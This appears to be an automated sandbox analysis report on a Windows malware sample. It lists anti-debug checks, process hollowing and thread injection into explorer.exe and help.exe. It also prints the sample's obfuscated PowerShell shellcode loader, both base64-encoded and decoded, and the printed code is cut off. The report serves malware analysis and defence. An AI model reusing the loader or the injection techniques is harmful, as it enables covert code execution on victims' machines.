Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B1E1 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBA41E8 mov eax, dword ptr fs:[00000030h] 24_2_1EBA41E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 mov eax, dword ptr fs:[00000030h] 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov ecx, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB96DC9 mov eax, dword ptr fs:[00000030h] 24_2_1EB96DC9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1AD30 mov eax, dword ptr fs:[00000030h] 24_2_1EB1AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB23D34 mov eax, dword ptr fs:[00000030h] 24_2_1EB23D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE8D34 mov eax, dword ptr fs:[00000030h] 24_2_1EBE8D34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4513A mov eax, dword ptr fs:[00000030h] 24_2_1EB4513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4513A mov eax, dword ptr fs:[00000030h] 24_2_1EB4513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB9A537 mov eax, dword ptr fs:[00000030h] 24_2_1EB9A537
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB44D3B mov eax, dword ptr fs:[00000030h] 24_2_1EB44D3B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov eax, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 mov ecx, dword ptr fs:[00000030h] 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB19100 mov eax, dword ptr fs:[00000030h] 24_2_1EB19100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B171 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1B171 mov eax, dword ptr fs:[00000030h] 24_2_1EB1B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3C577 mov eax, dword ptr fs:[00000030h] 24_2_1EB3C577
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3C577 mov eax, dword ptr fs:[00000030h] 24_2_1EB3C577
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1C962 mov eax, dword ptr fs:[00000030h] 24_2_1EB1C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB37D50 mov eax, dword ptr fs:[00000030h] 24_2_1EB37D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB53D43 mov eax, dword ptr fs:[00000030h] 24_2_1EB53D43
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3B944 mov eax, dword ptr fs:[00000030h] 24_2_1EB3B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB3B944 mov eax, dword ptr fs:[00000030h] 24_2_1EB3B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB93540 mov eax, dword ptr fs:[00000030h] 24_2_1EB93540
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_1EB596E0
Source: C:\Windows\System32\smartscreen.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 2B0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Bacong Sletn FEJLPLA Vindfl4 fara arter Overaro CINENEG Ddsofrer1 BRITTLEPA Semicoron Bunddyre1 UNMANAG RICOCHET henregn Inddelinge1 ROTATI Overfodres1 QUIET araban INDD ubetime aktivist perturbf JAGEREN KILOMEGA Achondr Bnne Congreg3 BRANDEN Ingenirt2 Revo Scir Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Handl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Handl6,ref Int32 NONMALIG,int metategn,ref Int32 Handl,int Bordsk6,int Handl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DAUGHTER,uint Tanzani5,int haan,int Handl0,int Fallacies5,int BGER,int Quinque7);[DllImport("kernel32.dll")]public static extern int ReadFile(int metategn0,uint metategn1,IntPtr metategn2,ref Int32 metategn3,int metategn4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr metategn5,int metategn6,int metategn7,int metategn8,int metategn9);}"@#Vejrfo9 clockra LIMB Overm6 Hyper Disdain noncon toldattes Sulca Oprethol holochorda Kontrolkom Filter Bergmanns COENURI DAGN UDRKSSTRA Test-Path "blaalysene" Test-Path "Kuglepe1" $Handl3=0;$Handl9=1048576;$Handl8=[Handl1]::NtAllocateVirtualMemory(-1,[ref]$Handl3,0,[ref]$Handl9,12288,64)#DEFI Nont2 nonconst overtenac igdrasilma laantagere AMPHODA GALEHUSSHA Primordiai Autent5 Visc7 Columnists forbyt sprr Pyrexia blattif kyllingeh LIVFULDTV shatteri MAALSTNIN Semirad5 Fors5 IMMITIG
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Bacong Sletn FEJLPLA Vindfl4 fara arter Overaro CINENEG Ddsofrer1 BRITTLEPA Semicoron Bunddyre1 UNMANAG RICOCHET henregn Inddelinge1 ROTATI Overfodres1 QUIET araban INDD ubetime aktivist perturbf JAGEREN KILOMEGA Achondr Bnne Congreg3 BRANDEN Ingenirt2 Revo Scir Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Handl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Handl6,ref Int32 NONMALIG,int metategn,ref Int32 Handl,int Bordsk6,int Handl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string DAUGHTER,uint Tanzani5,int haan,int Handl0,int Fallacies5,int BGER,int Quinque7);[DllImport("kernel32.dll")]public static extern int ReadFile(int metategn0,uint metategn1,IntPtr metategn2,ref Int32 metategn3,int metategn4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr metategn5,int metategn6,int metategn7,int metategn8,int metategn9);}"@#Vejrfo9 clockra LIMB Overm6 Hyper Disdain noncon toldattes Sulca Oprethol holochorda Kontrolkom Filter Bergmanns COENURI DAGN UDRKSSTRA Test-Path "blaalysene" Test-Path "Kuglepe1" $Handl3=0;$Handl9=1048576;$Handl8=[Handl1]::NtAllocateVirtualMemory(-1,[ref]$Handl3,0,[ref]$Handl9,12288,64)#DEFI Nont2 nonconst overtenac igdrasilma laantagere AMPHODA GALEHUSSHA Primordiai Autent5 Visc7 Columnists forbyt sprr Pyrexia blattif kyllingeh LIVFULDTV shatteri MAALSTNIN Semirad5 Fors5 IMMITIG Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3440 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgB